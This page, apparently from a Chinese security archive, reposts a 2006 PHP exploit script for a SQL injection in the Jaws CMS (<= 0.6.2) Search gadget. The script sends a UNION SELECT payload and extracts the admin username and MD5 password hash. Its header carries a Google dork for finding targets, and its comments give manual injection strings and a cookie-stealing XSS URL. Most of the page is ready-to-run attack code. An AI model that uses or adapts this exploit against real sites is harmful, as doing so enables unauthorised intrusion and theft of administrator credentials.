首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Jaws <= 0.6.2 (Search gadget) Remote SQL Injection Exploit
来源:http://retrogod.altervista.org 作者:rgod 发布时间:2006-06-27  

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Jaws <= 0.6.2 'Search gadget' SQL injection / admin credentials disclosure\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "dork: \"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search\r\n\r\n";
/*
works regardless of php.ini settings
if 'Search gadget' is enabled
*/

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to jaws\r\n";
echo "Options:\r\n";
echo " -T[prefix] specify a table prefix different from default (no prefix)\r\n";
echo " try blog_ even\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /jaws/ \r\n";
echo "php ".$argv[0]." localhost /jaws/ -Tblog_\r\n";
die;
}

# software site: http://www.jaws-project.com/
# manual exploitation:
#
# i)sql injection:
# go to http://[target]/[path_to_jaws]/?gadget=Search
# if search module is enabled, in search field type:
#
# 1%')/**/UNION/**/SELECT/**/0,passwd,username,0,0/**/FROM/**/users/**/WHERE/**/id=1/*
#
# or
@
# 1%')/**/UNION/**/SELECT/**/0,passwd,username,0,0/**/FROM/**/blog_users/**/WHERE/**/id=1/*
#
# now at screen you have admin username & password hash
# this works with magic_quotes_gpc both on & off
#
# ii)xss:
# http://[target]/[path_to_jaws]/gadgets/RssReader/extras/magpierss/scripts/magpie_slashbox.php?rss_url=<script>alert(document.cookie)</script>


error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="";
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$sql="1%')/**/UNION/**/SELECT/**/0,CONCAT('*SUNTZU*',passwd,'*SUNTZU*'),CONCAT('*SUNTZOI*',username,'*SUNTZOI*'),0,0/**/FROM/**/".$prefix."users/**/WHERE/**/id=1/*";
$sql=urlencode($sql);
$data="gadget=Search";
$data.="&action=Results";
$data.="&gadgets=All";
$data.="&searchdata=".$sql;
$data.="&searchButton=Search";
$packet="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("Gadget is not enabled",$html))
{
die("search gadget is not enabled... exploit failed");
}
$temp=explode('">*SUNTZOI*',$html);
$temp2=explode('*SUNTZOI*',$temp[1]);
$admin=$temp2[0];
$temp=explode('href="*SUNTZU*',$html);
$temp2=explode('*SUNTZU*',$temp[1]);
$hash=$temp2[0];
if (($admin<>'') and ($hash<>'') and (is_hash($hash)))
{
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin -> ".$admin."\r\n";
echo "password (md5) -> ".$hash."\r\n";
echo "--------------------------------------------------------------------\r\n";
}
else
{
echo "Exploit failed, maybe wrong table prefix...";
}
?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DataLife Engine <= 4.1 Remo
·BitchX <= 1.1-final do_hook
·DataLife Engine <= 4.1 Remo
·XM Easy Personal FTP Server 5.
·Winamp <= 5.21 (Midi File H
·MyBulletinBoard (MyBB) <= 1
·Microsoft Excel Unicode Local
·DeluxeBB <= 1.07 (cp.php) C
·Joomla <= 1.0.9 (Weblinks)
·DreamAccount <= 3.1 (auth.a
·FlashBB <= 1.1.5 (phpbb_roo
·NIPrint LPD Request Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved